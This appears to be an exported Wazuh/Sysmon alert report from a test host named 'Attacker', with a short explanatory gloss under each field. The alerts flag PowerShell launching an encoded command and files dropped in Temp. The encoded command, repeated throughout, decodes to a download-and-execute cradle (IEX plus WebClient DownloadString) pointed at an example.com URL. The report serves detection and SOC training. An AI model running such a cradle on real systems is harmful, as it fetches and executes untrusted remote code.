No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:46.007+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:46.007+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534266.1474564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:44.1199096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284054
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:44.080 ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ProcessId: 14008 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rm1lhycc.bo2.ps1 CreationUtcTime: 2025-04-24 22:37:44.080 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:44.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rm1lhycc.bo2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:44.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:49.103+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:49.103+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534269.1477333
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:46.7468088Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284082
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:45.366 ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ProcessId: 11904 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} ParentProcessId: 14008 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:45.366
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd36-680a-530b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14008
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:49.122+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:49.122+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534269.1485404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:47.0408204Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284083
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:46.996 ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ProcessId: 11904 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bkyc1qor.00t.ps1 CreationUtcTime: 2025-04-24 22:37:46.996 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:46.996
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bkyc1qor.00t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:46.996
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:52.767+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:52.767+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534272.1488173
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:50.1585075Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284107
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:48.495 ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ProcessId: 10384 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ParentProcessId: 11904 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:48.495
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

